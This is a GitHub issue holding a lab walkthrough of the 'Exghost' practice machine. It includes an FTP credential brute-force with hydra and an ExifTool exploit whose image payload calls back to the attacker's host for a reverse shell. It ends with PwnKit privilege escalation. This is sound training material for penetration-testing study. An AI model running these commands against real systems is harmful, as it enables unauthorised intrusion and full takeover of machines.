Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Exghost (easy) #10

Open
WDavid404 opened this issue Jul 14, 2024 · 1 comment
Open

Exghost (easy) #10

WDavid404 opened this issue Jul 14, 2024 · 1 comment

Comments

@WDavid404
Copy link
Owner

WDavid404 commented Jul 14, 2024

keypoints:

  • FTP brute-force
    hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183
  • [PE] PwnKit Vulnerability (CVE-2021–4034) --pythone version for exploit

Learned:

  • FFUF may get more info than feroxbuster
@WDavid404
Copy link
Owner Author

WDavid404 commented Jul 15, 2024

PORT   STATE  SERVICE  REASON         VERSION
21/tcp open   ftp      syn-ack ttl 61 vsftpd 3.0.3
80/tcp open   http     syn-ack ttl 61 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: 403 Forbidden

FTP via anonymouse --> faile

search vsftpd 3.0.3 exploit --> https://www.exploit-db.com/exploits/49719 (Remote Denial of Service)
search apache 2.4.41 exploit --> no useful info

feroxbuster -u http://192.168.243.183/ -k -C 404,503,502
--> /uploads (301)

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.183/FUZZ
--> get more info:
/uploads
/exiftool
/server-status

Access /exiftool --> get version info: '12.23'
--->
https://www.exploit-db.com/exploits/50911
--> however, didn't find a way to use it

Try brute-forse FTP:
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183
image

ftp login
ls command --> "229 Entering Extended Passive Mode"
resolve: input "passive" command
“get backup" to download backup file
-->
image

Prepare an image
python3 50911.py -s 192.168.45.192 4444
--> generate a jpg image file.

curl -POST -F myFile=@/home/kali/pen-200/PGBox/image.jpg 192.168.243.183/exiftest.php -H 'Content-Type: multipart/form-data' -vv
--> get reverse shell

linpeas.sh
-->CVE-2021–4034
image
--->
There is python instead of compiling c++:
https://github.com/joeammond/CVE-2021-4034.git
-->
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant